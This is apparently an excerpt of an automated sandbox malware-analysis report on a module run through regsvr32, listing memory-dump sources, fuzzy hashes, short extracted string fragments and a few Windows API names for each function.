                                                                                                                                      • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                                      • Instruction Fuzzy Hash: 146151B6B0C599D7D6689A62D9583E97391FF84709F000A3AD75D87290CF3CE4A4C731
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: V$@$P9$^_"
                                                                                                                                      • API String ID: 0-1880944046
                                                                                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                      • API String ID: 0-746338152
                                                                                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *i^$MIC$-Z$]2
                                                                                                                                      • API String ID: 0-498664264
                                                                                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: >97"$?$LsRW$~x
                                                                                                                                      • API String ID: 0-2554301858
                                                                                                                                      • Opcode ID: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                      • Instruction ID: eb38a845d203af82144c13b3f151f5fa827cd0cb8678597ee03ac1a376820114
                                                                                                                                      • Opcode Fuzzy Hash: b37088c51263af6e06ebf62d89f1bff1b13e76a95d3b3fa096a3ef4bda325288
                                                                                                                                      • Instruction Fuzzy Hash: E1D1E7705067C8CBEBBADFA4D885BCD3BA8FB44744F106219EC4AEA250DB745749CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: B$EG$QsF$_
                                                                                                                                      • API String ID: 0-784369960
                                                                                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                      • API String ID: 0-1363032466
                                                                                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *+_$WSh$\O$#o
                                                                                                                                      • API String ID: 0-1846314129
                                                                                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .B$O$M*K$\<
                                                                                                                                      • API String ID: 0-3225238681
                                                                                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$$$xVO$~O
                                                                                                                                      • API String ID: 0-3655128719
                                                                                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,IW$G$JMg$l
                                                                                                                                      • API String ID: 0-1370644289
                                                                                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$__tzset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3587134695-0
                                                                                                                                      • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                      • Instruction ID: c2a14873644e6fbcb57f1dca012b0a90d346a55522f5577df9e8e5aabc28bdd0
                                                                                                                                      • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                      • Instruction Fuzzy Hash: 26029632A0C6AAC7E7748F2AD8B853D27A2FF44749F24483AD74E46691DE38D944C731
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$DecodePointer_lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175075375-0
                                                                                                                                      • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                      • Instruction ID: b703e3e93b8c386c801852b16e8847f0c27d5fbf45af061186059ec6b2283983
                                                                                                                                      • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                      • Instruction Fuzzy Hash: 97319E21B4C76BC2FB65DA63957A37B6291AF58388F044C34DE4D47A85EE2CE400CA38
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlCaptureContext.KERNEL32 ref: 00007FFC6720D357
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC6720D39D
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32 ref: 00007FFC6720D3A8
                                                                                                                                        • Part of subcall function 00007FFC67206F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC67206FCF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2731829486-0
                                                                                                                                      • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                      • Instruction ID: 07f6551347c06fa2e93bf1b2ca8e16bef34ef986d3fcd7c33d36eb8829e8c7be
                                                                                                                                      • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                      • Instruction Fuzzy Hash: 95115B3562C6AAC2E7249B52E46477A6791FF85308F440639E64D02B95DF3DE104CB31
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *4$5F$S^r
                                                                                                                                      • API String ID: 0-3556444313
                                                                                                                                      • Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                                      • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                                                                                      • Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                                      • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: &lz2$'~W$<x<
                                                                                                                                      • API String ID: 0-2268522332
                                                                                                                                      • Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                                      • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                                                                                      • Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                                      • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$T]0$ba^2
                                                                                                                                      • API String ID: 0-1276948933
                                                                                                                                      • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                      • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                                                                                      • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                      • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 6w5*$EDO$V
                                                                                                                                      • API String ID: 0-1640223502
                                                                                                                                      • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                      • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                                                                                      • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                      • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Y()$i_"o$|Y
                                                                                                                                      • API String ID: 0-942011364
                                                                                                                                      • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                      • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                                                                                      • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                      • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: O)$,G$-
                                                                                                                                      • API String ID: 0-23008916
                                                                                                                                      • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                      • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                                                                                      • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                      • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ;U[$L$Q#
                                                                                                                                      • API String ID: 0-2933747092
                                                                                                                                      • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                      • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                                                                                      • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                      • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5($<:*$qwX
                                                                                                                                      • API String ID: 0-3944236288
                                                                                                                                      • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                      • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                                                                                      • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                      • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 79&$s`~$v;
                                                                                                                                      • API String ID: 0-3844292866
                                                                                                                                      • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                      • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                                                                                      • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                      • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: wQ_$1_$ac
                                                                                                                                      • API String ID: 0-1037425278
                                                                                                                                      • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                      • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                                                                                      • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                      • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
